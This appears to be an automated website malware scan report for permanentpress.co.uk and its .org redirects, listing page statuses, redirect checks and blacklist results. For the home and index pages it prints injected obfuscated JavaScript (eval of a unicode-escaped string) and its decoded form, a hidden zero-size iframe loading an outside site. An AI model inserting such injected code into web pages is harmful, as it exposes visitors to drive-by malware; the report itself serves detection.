Scanned pages/files
Request | Server response | Status |
http://permanentpress.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:08 GMT Location: http://www.permanentpress.co.uk/ Server: Apache Vary: Accept-Encoding Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.permanentpress.co.uk/ | 200 OK Content-Length: 4953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var ShowText = eval; ShowText('\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0027\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0063\u0068\u0061\u0074\u0073\u0069\u0064\u0065\u002e\u006e\u0065\u0074\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0
Decoded script:
document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>');
<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>
Antivirus reports:
http://www.permanentpress.co.uk/GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 74417 Content-Type: application/javascript | clean |
http://permanentpress.org/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:10 GMT Location: http://www.permanentpress.co.uk/index.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.permanentpress.co.uk/index.html | 200 OK Content-Length: 4953 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var ShowText = eval; ShowText('\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0027\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0063\u0068\u0061\u0074\u0073\u0069\u0064\u0065\u002e\u006e\u0065\u0074\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0
Decoded script:
document.write('<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>');
<iframe src="http://chatside.net/go.php?sid=1" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden"></iframe>
Antivirus reports:
http://www.permanentpress.co.uk/about.html | 200 OK Content-Length: 7480 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/publications.html | 200 OK Content-Length: 109128 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/file:///C:/Documents%20and%20Settings/user/Application%20Data/Adobe/Adobe%20GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js | 404 Not Found Content-Length: 438 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/contact.html | 200 OK Content-Length: 6293 Content-Type: text/html | clean |
http://www.permanentpress.co.uk/links.html | 200 OK Content-Length: 6251 Content-Type: text/html | clean |
http://permanentpress.org/publications.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:14 GMT Location: http://www.permanentpress.co.uk/publications.html Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/contact.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/contact.html Server: Apache Vary: Accept-Encoding Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/links.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/links.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://permanentpress.org/about.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 09:15:15 GMT Location: http://www.permanentpress.co.uk/about.html Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: permanentpress.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 27 Feb 2015 09:15:08 GMT
Location: http://www.permanentpress.co.uk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: permanentpress.org
Referer: http://www.google.com/search?q=permanentpress.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=permanentpress.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://permanentpress.org/
Result: permanentpress.org is not infected or malware details are not published yet.